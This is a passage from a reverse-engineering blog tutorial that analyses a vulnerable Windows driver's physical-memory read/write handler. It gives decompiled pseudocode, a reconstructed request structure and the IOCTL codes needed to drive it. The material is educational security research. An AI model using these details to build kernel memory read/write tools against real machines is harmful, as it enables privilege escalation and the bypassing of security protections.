</span></span></code></pre></div><p>You should get the hang of it now, so I&rsquo;ll leave the vulnerable driver at the end so you can reverse every vulnerability yourself since this process is becoming more repetitive than informative. But before I do that, we&rsquo;ll go over one last vulnerability.</p>
<h2 id="readwrite-physical-memory">Read/Write Physical Memory</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-cpp" data-lang="cpp"><span style="display:flex;"><span>mapped_buffer_1 <span style="color:#f92672">=</span> MmMapIoSpace(SystemBuffer<span style="color:#f92672">-&gt;</span>PhysicalAddress, SystemBuffer<span style="color:#f92672">-&gt;</span>Flags, <span style="color:#ae81ff">0</span>i64);
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">if</span> ( mapped_buffer_1 )
</span></span><span style="display:flex;"><span>  {
</span></span><span style="display:flex;"><span>    return_buffer <span style="color:#f92672">=</span> (WCHAR <span style="color:#f92672">*</span>)SystemBuffer<span style="color:#f92672">-&gt;</span>Name;
</span></span><span style="display:flex;"><span>    number_of_bytes <span style="color:#f92672">=</span> SystemBuffer<span style="color:#f92672">-&gt;</span>Flags;
</span></span><span style="display:flex;"><span>    mapped_buffer <span style="color:#f92672">=</span> (<span style="color:#66d9ef">int</span> <span style="color:#f92672">*</span>)mapped_buffer_1;
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">while</span> ( number_of_bytes )
</span></span><span style="display:flex;"><span>    {
</span></span><span style="display:flex;"><span>      DataType <span style="color:#f92672">=</span> <span style="color:#f92672">*</span>(<span style="color:#f92672">&amp;</span>SystemBuffer<span style="color:#f92672">-&gt;</span>Flags <span style="color:#f92672">+</span> <span style="color:#ae81ff">1</span>);
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">if</span> ( DataType )
</span></span><span style="display:flex;"><span>      {
</span></span><span style="display:flex;"><span>        v35 <span style="color:#f92672">=</span> DataType <span style="color:#f92672">-</span> <span style="color:#ae81ff">1</span>;
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">if</span> ( v35 )
</span></span><span style="display:flex;"><span>        {
</span></span><span style="display:flex;"><span>          <span style="color:#66d9ef">if</span> ( v35 <span style="color:#f92672">==</span> <span style="color:#ae81ff">1</span> )
</span></span><span style="display:flex;"><span>          {
</span></span><span style="display:flex;"><span>            value <span style="color:#f92672">=</span> <span style="color:#f92672">*</span>mapped_buffer<span style="color:#f92672">++</span>;
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">*</span>(_DWORD <span style="color:#f92672">*</span>)return_buffer <span style="color:#f92672">=</span> value;
</span></span><span style="display:flex;"><span>            return_buffer <span style="color:#f92672">+=</span> <span style="color:#ae81ff">2</span>;
</span></span><span style="display:flex;"><span>            number_of_bytes <span style="color:#f92672">-=</span> <span style="color:#ae81ff">4</span>;
</span></span><span style="display:flex;"><span>          }
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">else</span>
</span></span><span style="display:flex;"><span>        {
</span></span><span style="display:flex;"><span>          word_value <span style="color:#f92672">=</span> <span style="color:#f92672">*</span>(_WORD <span style="color:#f92672">*</span>)mapped_buffer;
</span></span><span style="display:flex;"><span>          mapped_buffer <span style="color:#f92672">=</span> (<span style="color:#66d9ef">int</span> <span style="color:#f92672">*</span>)((<span style="color:#66d9ef">char</span> <span style="color:#f92672">*</span>)mapped_buffer <span style="color:#f92672">+</span> <span style="color:#ae81ff">2</span>);
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">*</span>return_buffer<span style="color:#f92672">++</span> <span style="color:#f92672">=</span> word_value;
</span></span><span style="display:flex;"><span>          number_of_bytes <span style="color:#f92672">-=</span> <span style="color:#ae81ff">2</span>;
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">else</span>
</span></span><span style="display:flex;"><span>      {
</span></span><span style="display:flex;"><span>        byte_value <span style="color:#f92672">=</span> <span style="color:#f92672">*</span>(<span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">__int8</span> <span style="color:#f92672">*</span>)mapped_buffer;
</span></span><span style="display:flex;"><span>        mapped_buffer <span style="color:#f92672">=</span> (<span style="color:#66d9ef">int</span> <span style="color:#f92672">*</span>)((<span style="color:#66d9ef">char</span> <span style="color:#f92672">*</span>)mapped_buffer <span style="color:#f92672">+</span> <span style="color:#ae81ff">1</span>);
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">*</span>(_BYTE <span style="color:#f92672">*</span>)return_buffer <span style="color:#f92672">=</span> byte_value;
</span></span><span style="display:flex;"><span>        return_buffer <span style="color:#f92672">=</span> (WCHAR <span style="color:#f92672">*</span>)((<span style="color:#66d9ef">char</span> <span style="color:#f92672">*</span>)return_buffer <span style="color:#f92672">+</span> <span style="color:#ae81ff">1</span>);
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">--</span>number_of_bytes;
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>    MmUnmapIoSpace(mapped_buffer_1, SystemBuffer<span style="color:#f92672">-&gt;</span>Flags);
</span></span><span style="display:flex;"><span>    v30 <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>;
</span></span><span style="display:flex;"><span>  }
</span></span></code></pre></div><p>Let&rsquo;s analyse the psuedocode above line by line and try to make sense of what&rsquo;s going on. I have casted the communication buffer <code>(SystemBuffer)</code> to a structure type of <code>RTL_QUERY_REGISTRY_TABLE</code> and renamed the fields, which will help us understand the alignment of the different fields within the communication buffer we will be constructing. I will be referring to the <code>RTL_QUERY_REGISTRY_TABLE</code> structure as &lsquo;RtlQ&rsquo; from now on. The layout of this structure is shown below.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-cpp" data-lang="cpp"><span style="display:flex;"><span><span style="color:#66d9ef">struct</span> <span style="color:#a6e22e">_RTL_QUERY_REGISTRY_TABLE</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>    LONG (<span style="color:#f92672">*</span>QueryRoutine)(WCHAR<span style="color:#f92672">*</span> arg1, ULONG arg2, VOID<span style="color:#f92672">*</span> 
</span></span><span style="display:flex;"><span>        arg3, ULONG arg4, VOID<span style="color:#f92672">*</span> arg5, VOID<span style="color:#f92672">*</span> arg6);  <span style="color:#75715e">//0x0
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>    ULONG Flags;                                    <span style="color:#75715e">//0x8
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>    WCHAR<span style="color:#f92672">*</span> Name;                                    <span style="color:#75715e">//0x10
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>    VOID<span style="color:#f92672">*</span> EntryContext;                             <span style="color:#75715e">//0x18
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>    ULONG DefaultType;                              <span style="color:#75715e">//0x20
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>    VOID<span style="color:#f92672">*</span> DefaultData;                              <span style="color:#75715e">//0x28
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>    ULONG DefaultLength;                            <span style="color:#75715e">//0x30
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>};
</span></span></code></pre></div><p>On the first line we see a call to <code>MmMapIoSpace</code>, which maps a physical address range in the virtual <code>system PTE</code> range. It uses a physical address provided by our communication buffer, which should be the first suboject, and the amount of bytes from the physical range that should be mapped, which should be the next subobject. <code>SystemBuffer-&gt;PhysicalAddress</code> has the same offset from the beginning of <code>SystemBuffer</code> as <code>RtlQ-&gt;QueryRoutine</code> does from <code>RtlQ</code> (an offset of 0), and they are both the size of an <code>int64</code>. This means that the next subobject, which we&rsquo;ve already identified as the number of bytes to be mapped, should start at <code>(SystemBuffer + 0x8)</code>, making <code>SystemBuffer-&gt;NumberOfBytes</code> have the same offset as <code>RtlQ-&gt;Flags</code> from the beginning of the structure. After the call to <code>MmMapIoSpace</code> is made, it&rsquo;s return value is checked, and if the function fails the <code>StatusCode</code> of the <code>IOCTL </code>operation is set to <code>0xC0000001 (STATUS_UNSUCCESSFUL)</code>. In the case that the call did succeed, we begin iterating under the condition that the number of bytes is greater than zero. Now, another subobject within our communication buffer is introduced, which I&rsquo;ve named <code>DataType</code> for now. In the case that this value is 0, we <code>jmp</code> to the block of code down below.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-cpp" data-lang="cpp"><span style="display:flex;"><span>       	byte_value <span style="color:#f92672">=</span> <span style="color:#f92672">*</span>(<span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">__int8</span> <span style="color:#f92672">*</span>)mapped_buffer;
</span></span><span style="display:flex;"><span>        mapped_buffer <span style="color:#f92672">=</span> (<span style="color:#66d9ef">int</span> <span style="color:#f92672">*</span>)((<span style="color:#66d9ef">char</span> <span style="color:#f92672">*</span>)mapped_buffer <span style="color:#f92672">+</span> <span style="color:#ae81ff">1</span>);
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">*</span>(_BYTE <span style="color:#f92672">*</span>)return_buffer <span style="color:#f92672">=</span> byte_value;
</span></span><span style="display:flex;"><span>        return_buffer <span style="color:#f92672">=</span> (WCHAR <span style="color:#f92672">*</span>)((<span style="color:#66d9ef">char</span> <span style="color:#f92672">*</span>)return_buffer <span style="color:#f92672">+</span> <span style="color:#ae81ff">1</span>);
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">--</span>number_of_bytes;
</span></span></code></pre></div><p>From this psuedocode, it is clear that this is a read operation. First, the value at the start of the mapped buffer is stored into a variable named <code>byte_value</code>, and then <code>mapped_buffer</code> is incremented to point to the byte that is after the previous byte that was read. Then, <code>byte_value</code> is copied into <code>return_buffer</code>, who&rsquo;s initial value was:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-cpp" data-lang="cpp"><span style="display:flex;"><span>    return_buffer <span style="color:#f92672">=</span> (<span style="color:#66d9ef">wchar_t</span> <span style="color:#f92672">*</span>)SystemBuffer<span style="color:#f92672">-&gt;</span>ReturnBuffer;
</span></span></code></pre></div><p>After the copy, we increment the return_buffer to point to the byte after where the new data was copied. Then, the <code>NumberOfBytes</code> is decremented to indicate that we have copied one byte. When all the bytes are copied, <code>NumberOfBytes</code> will equal zero, and the loop will break. So, essentially, we map a physical range to a <code>system PTE</code> virtual range and then copy the contents of that range, byte by byte, into a user-mode buffer. Now we see that the other two options specified by the value of <code>DataType</code> only differ in the way they copy each section of memory. If <code>DataType</code> is 2, then data will be copied as <code>DWORD</code> (4 bytes) chunks, and if <code>DataType</code> is 1, it&rsquo;ll be copied as <code>WORDS</code> (2 bytes). Knowing this, we can reconstruct the psuedocode to make it easily understandable</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-cpp" data-lang="cpp"><span style="display:flex;"><span><span style="color:#75715e">#define SIZEOF_DWORD 4
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">#define SIZEOF_WORD 2
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">#define SIZEOF_BYTE 1
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">int</span><span style="color:#f92672">*</span> mapped_buffer <span style="color:#f92672">=</span> (<span style="color:#66d9ef">int</span><span style="color:#f92672">*</span>)MmMapIoSpace(SystemBuffer<span style="color:#f92672">-&gt;</span>PhysicalAddress, 
</span></span><span style="display:flex;"><span>		SystemBuffer<span style="color:#f92672">-&gt;</span>NumberOfBytes, <span style="color:#ae81ff">0</span>i64); 
</span></span><span style="display:flex;"><span>        
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">if</span> ( <span style="color:#f92672">!</span>mapped_buffer ) 
</span></span><span style="display:flex;"><span>{ 
</span></span><span style="display:flex;"><span>    StatusCode <span style="color:#f92672">=</span> STATUS_UNSUCCESSFUL; 
</span></span><span style="display:flex;"><span>    Irp<span style="color:#f92672">-&gt;</span>IoStatus<span style="color:#f92672">-&gt;</span>Status <span style="color:#f92672">=</span> StatusCode;
</span></span><span style="display:flex;"><span>    Irp<span style="color:#f92672">-&gt;</span>IoStatus<span style="color:#f92672">-&gt;</span>Information <span style="color:#f92672">=</span> <span style="color:#ae81ff">24</span>;
</span></span><span style="display:flex;"><span>    IofCompleteRequest(Irp, <span style="color:#ae81ff">0</span>);
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">else</span> 
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>    return_buffer <span style="color:#f92672">=</span> (WCHAR <span style="color:#f92672">*</span>)SystemBuffer<span style="color:#f92672">-&gt;</span>ReturnBuffer;
</span></span><span style="display:flex;"><span>    number_of_bytes <span style="color:#f92672">=</span> SystemBuffer<span style="color:#f92672">-&gt;</span>NumberOfBytes;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">while</span> (NumberOfBytes) 
</span></span><span style="display:flex;"><span>    {
</span></span><span style="display:flex;"><span>        DataType <span style="color:#f92672">=</span> <span style="color:#f92672">*</span>(<span style="color:#f92672">&amp;</span>SystemBuffer<span style="color:#f92672">-&gt;</span>NumberOfBytes <span style="color:#f92672">+</span> SIZEOF_BYTE);
</span></span><span style="display:flex;"><span>      
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">if</span> ( DataType <span style="color:#f92672">==</span> <span style="color:#ae81ff">2</span> )
</span></span><span style="display:flex;"><span>        {
</span></span><span style="display:flex;"><span>      	    <span style="color:#75715e">// Copy DWORD by DWORD
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>            dword_value <span style="color:#f92672">=</span> <span style="color:#f92672">*</span>mapped_buffer<span style="color:#f92672">++</span>;
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">*</span>(_DWORD <span style="color:#f92672">*</span>)return_buffer <span style="color:#f92672">=</span> dword_value;
</span></span><span style="display:flex;"><span>            return_buffer <span style="color:#f92672">+=</span> SIZEOF_WORD;
</span></span><span style="display:flex;"><span>            number_of_bytes <span style="color:#f92672">-=</span> SIZEOF_DWORD;
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">else</span> <span style="color:#a6e22e">if</span> ( DataType <span style="color:#f92672">==</span> <span style="color:#ae81ff">1</span> )
</span></span><span style="display:flex;"><span>        {
</span></span><span style="display:flex;"><span>      	    <span style="color:#75715e">// Copy WORD by WORD
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>            word_value <span style="color:#f92672">=</span> <span style="color:#f92672">*</span>(_WORD <span style="color:#f92672">*</span>)mapped_buffer;
</span></span><span style="display:flex;"><span>            mapped_buffer <span style="color:#f92672">=</span> (<span style="color:#66d9ef">int</span> <span style="color:#f92672">*</span>)((<span style="color:#66d9ef">char</span> <span style="color:#f92672">*</span>)mapped_buffer <span style="color:#f92672">+</span> SIZE_WORD);
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">*</span>return_buffer<span style="color:#f92672">++</span> <span style="color:#f92672">=</span> word_value;
</span></span><span style="display:flex;"><span>            number_of_bytes <span style="color:#f92672">-=</span> SIZEOF_WORD;
</span></span><span style="display:flex;"><span>        } 
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">else</span> <span style="color:#a6e22e">if</span> ( DataType <span style="color:#f92672">==</span> <span style="color:#ae81ff">0</span> )
</span></span><span style="display:flex;"><span>        {
</span></span><span style="display:flex;"><span>      	    <span style="color:#75715e">// Copy BYTE by BYTE
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>      	    byte_value <span style="color:#f92672">=</span> <span style="color:#f92672">*</span>(<span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">__int8</span> <span style="color:#f92672">*</span>)mapped_buffer;
</span></span><span style="display:flex;"><span>            mapped_buffer <span style="color:#f92672">=</span> (<span style="color:#66d9ef">int</span> <span style="color:#f92672">*</span>)((<span style="color:#66d9ef">char</span> <span style="color:#f92672">*</span>)mapped_buffer <span style="color:#f92672">+</span> SIZEOF_BYTE);
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">*</span>(_BYTE <span style="color:#f92672">*</span>)return_buffer <span style="color:#f92672">=</span> byte_value;
</span></span><span style="display:flex;"><span>            return_buffer <span style="color:#f92672">=</span> (WCHAR <span style="color:#f92672">*</span>)((<span style="color:#66d9ef">char</span> <span style="color:#f92672">*</span>)return_buffer <span style="color:#f92672">+</span> SIZEOF_BYTE);
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">--</span>number_of_bytes;
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>     }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>So our communication buffer should look something like this.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-cpp" data-lang="cpp"><span style="display:flex;"><span><span style="color:#75715e">#pragma pack(push, 1)
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">typedef</span> <span style="color:#66d9ef">struct</span> <span style="color:#a6e22e">_READ_PHYSICAL</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">uint64_t</span> PhysicalAddress; <span style="color:#75715e">// 0x0 (Input)
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>	<span style="color:#66d9ef">uint32_t</span> NumberOfBytes;   <span style="color:#75715e">// 0x8 (Input)
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>	<span style="color:#66d9ef">uint32_t</span> DataType;        <span style="color:#75715e">// 0xC (Input)
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>	<span style="color:#66d9ef">void</span><span style="color:#f92672">*</span>    ReturnBuffer;    <span style="color:#75715e">// 0x10 (Output)
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>} READ_PHYSICAL, <span style="color:#f92672">*</span>PREAD_PHYSICAL;
</span></span><span style="display:flex;"><span><span style="color:#75715e">#pragma pack(pop)
</span></span></span></code></pre></div><p>The control code for this operation is <code>0x222808</code>, so you now have all the information needed to read physical memory with this driver. The &ldquo;write physical&rdquo; operation  is almost identical to the read operation, and so in depth explanation again is not needed. The only difference is that the purpose of the last field in the communication buffer should not be a user-mode allocated buffer that the mapped virtual memory will be copied to, but a value that the mapped virtual memory will be written to, the control code that maps to this operation is <code>0x22280C</code>.</p>
<h2 id="conclusion">Conclusion</h2>
<p>Now you should be able to reverse drivers for their device name, communication structures, control codes and understand the logic of the different operations. You should also understand how <code>IOCTL</code> works internally, at a high level. We&rsquo;ve looked at <code>R/W</code> control registers, allocate and release kernel memory and <code>R/W</code> physical memory. There are still a lot of different vulnerabilities that this driver exposes, so you can download it and continue reversing it for yourself here <a href="https://github.com/xgtbz/AsrOmgDrv">https://github.com/xgtbz/AsrOmgDrv</a>.</p>

            </div>
        </article></main>
</div>
<footer class="footer">
    <span class="footer_item"> </span>
    &nbsp;

    <div class="footer_social-icons">
<a href="https://github.com/xgtbz" target="_blank" rel="noopener noreferrer me"
    title="Github">
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"
    stroke-linecap="round" stroke-linejoin="round">
    <path
        d="M9 19c-5 1.5-5-2.5-7-3m14 6v-3.87a3.37 3.37 0 0 0-.94-2.61c3.14-.35 6.44-1.54 6.44-7A5.44 5.44 0 0 0 20 4.77 5.07 5.07 0 0 0 19.91 1S18.73.65 16 2.48a13.38 13.38 0 0 0-7 0C6.27.65 5.09 1 5.09 1A5.07 5.07 0 0 0 5 4.77a5.44 5.44 0 0 0-1.5 3.78c0 5.42 3.3 6.61 6.44 7A3.37 3.37 0 0 0 9 18.13V22">
    </path>
</svg>
</a>
</div>
    <small class="footer_copyright">
        © 2024 .
        
    </small>
</footer>







    
    <script async src="http://localhost:1313/xgtbzblog/js/main.js" ></script>

    

</body>
</html>
